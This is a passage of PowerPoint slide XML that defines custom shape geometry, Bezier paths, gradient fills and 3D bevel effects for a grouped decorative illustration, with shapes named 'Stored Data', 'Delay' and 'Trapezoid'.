                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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>
              <a:off x="2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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ectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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Rounded Rectangle 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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Rounded Rectangle 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Group 73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6563868" y="3186941"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Rectangle 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Trapezoid 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
